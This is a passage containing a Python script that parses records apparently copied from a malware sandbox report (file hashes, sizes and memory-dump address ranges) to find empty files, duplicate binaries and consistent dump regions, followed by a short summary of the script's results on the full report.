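\Users\Admin\AppData\Local\Temp\mtaskhost.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
-
memory/292-157-0x0000000000980000-0x0000000000A00000-memory.dmpFilesize
512KB
-
memory/436-122-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
memory/436-119-0x000000013FA70000-0x000000014086B000-memory.dmpFilesize
14.0MB
-
"""

HASHES = ("MD5", "SHA1", "SHA256", "SHA512")
HEAD_RE = re.compile(r"^(.*?)(MD5|SHA1|SHA256|SHA512|Filesize):?$")
LABEL_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512|Filesize):?\s*(.*)$")
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
# Digests of zero bytes: an entry carrying these had no content to hash.
EMPTY = {a: getattr(hashlib, a.lower())(b"").hexdigest() for a in HASHES}


def parse_entries(text):
    """Return one dict per '-'-separated record: {'path': ..., 'MD5': ..., ...}."""
    records, cur, pending = [], None, None
    for line in filter(None, (raw.strip() for raw in text.splitlines())):
        if line == "-":
            if cur:
                records.append(cur)
            cur, pending = None, None
        elif cur is None:  # first line of a record: path, maybe with a label glued on
            m = HEAD_RE.match(line)
            cur = {"path": m.group(1) if m else line}
            pending = m.group(2) if m else None
        elif pending:  # value belonging to the label that ended the previous line
            cur[pending], pending = line, None
        elif (m := LABEL_RE.match(line)) and m.group(2):
            cur[m.group(1)] = m.group(2)
        elif m:
            pending = m.group(1)
    if cur:
        records.append(cur)
    return records


def is_empty_content(rec):
    """True when every digest present is the digest of zero bytes."""
    present = [a for a in HASHES if a in rec]
    return bool(present) and all(rec[a].lower() == EMPTY[a] for a in present)


def duplicate_files(records):
    """SHA256 -> paths, for digests dropped under more than one path."""
    by_hash = defaultdict(list)
    for r in records:
        if "SHA256" in r:
            by_hash[r["SHA256"].lower()].append(r["path"])
    return {h: p for h, p in by_hash.items() if len(p) > 1}


def size_matches(listed, actual_bytes):
    """Compare a rounded display size ('14.0MB') with an exact byte count, allowing
    half a unit in the last displayed digit (my tolerance choice)."""
    m = re.match(r"^(\d+(?:\.(\d+))?)\s*([KMG]?B)$", listed)
    value, decimals, unit = float(m.group(1)), len(m.group(2) or ""), m.group(3)
    return abs(value * UNITS[unit] - actual_bytes) <= 0.5 * UNITS[unit] / 10 ** decimals


def memory_regions(records):
    """Dedupe dump entries into {pid: {(start, end): listed_size_consistent}}."""
    regions = defaultdict(dict)
    for r in records:
        m = MEM_RE.match(r["path"])
        if m and "Filesize" in r:
            pid, start, end = int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)
            regions[pid][(start, end)] = size_matches(r["Filesize"], end - start)
    return dict(regions)


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    print([r["path"] for r in recs if is_empty_content(r)], duplicate_files(recs))
    print({p: len(v) for p, v in memory_regions(recs).items()})
```

Run against the full page text instead of SAMPLE, the same three calls report the srvsvc entry as empty content, updater.exe and mtaskhost.exe as one binary under two paths, and collapse the eleven mtaskhost.exe dumps of PID 436 and the twelve updater.exe dumps of PID 1052 to a single 0xDFB000-byte region each, which is what the listed 14.0MB rounds from.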